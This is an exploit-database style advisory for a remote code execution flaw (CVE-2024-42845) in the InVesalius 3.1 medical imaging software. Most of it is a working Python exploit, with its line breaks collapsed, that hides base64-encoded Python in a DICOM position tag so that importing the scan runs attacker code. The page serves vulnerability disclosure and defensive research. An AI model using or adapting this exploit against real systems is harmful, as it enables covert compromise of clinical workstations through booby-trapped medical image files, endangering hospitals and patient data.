Headline
Invesalius 3.1 Remote Code Execution
Invesalius versions 3.1.99991 through 3.1.99998 suffer from a remote code execution vulnerability. The exploitation steps of this vulnerability involve the use of a specifically crafted DICOM file which, once imported inside the victim’s client application, allows an attacker to gain remote code execution.
# Exploit Title: Invesalius 3.1 - Remote Code Execution (RCE)# Discovered By: Riccardo Degli Esposti (partywave), Alessio Romano (sfoffo)# Exploit Author: Riccardo Degli Esposti (partywave), Alessio Romano (sfoffo)# Vendor Homepage: https://invesalius.github.io/# Software Link: https://github.com/invesalius/invesalius3/tree/master/invesalius# Version: 3.1.99991 to 3.1.99998# Tested on: Windows# CVE-ID: CVE-2024-42845# External references: https://www.partywave.site/show/research/Tic%20TAC%20-%20Beware%20of%20your%20scan, https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-42845#### exploit to create the malicious DICOM file###import pydicomimport base64import argparsepydicom.config.settings.reading_validation_mode = pydicom.config.IGNOREdef encode_payload(plain_payload): data = open(plain_payload, 'rb').read() return f"exec(__import__('base64').b64decode({base64.b64encode(data)})"def prepare_dicom_payload(dicom_file_path, sign, payload): try: dicom_data = pydicom.dcmread(dicom_file_path) if sign: dicom_data.Manufacturer = "Malicious DICOM file creator" dicom_data.InstitutionName = "Malicious DICOM file institution" values = dicom_data[0x0020, 0x0032].value mal = [str(i) for i in values] mal.append(encode_payload(payload)) except pydicom.errors.InvalidDicomError: print("The file is not a valid DICOM file.") except Exception as e: print(f"An error occurred: {e}") return maldef modify_dicom_field(dicom_file_path, malicious_tag, outfile): try: dicom_dataset = pydicom.dcmread(dicom_file_path) elem = pydicom.dataelem.DataElement(0x00200032, 'CS', malicious_tag) dicom_dataset[0x00200032] = elem print(dicom_dataset) dicom_dataset.save_as(outfile) except Exception as e: print(f"An error occurred: {e}")if __name__ == "__main__": parser = argparse.ArgumentParser(description='Read a DICOM file.') parser.add_argument('--dicom', required=True, help='Path to the input DICOM file') parser.add_argument('--outfile', required=True, help='Path to the output DICOM file') parser.add_argument('--payload', required=False, default=b"print('Test')", help='File that contains the malicious plain python3 code') parser.add_argument('--signature', required=False, default=True) args = parser.parse_args() dicom_infile_path = args.dicom dicom_outfile_path = args.outfile tmp_tag = prepare_dicom_payload(dicom_infile_path, sign=args.signature, payload=args.payload) if tmp_tag: malicious_tag = '\\'.join(tmp_tag) modify_dicom_field(dicom_infile_path, malicious_tag, dicom_outfile_path) exit(0) else: exit(1)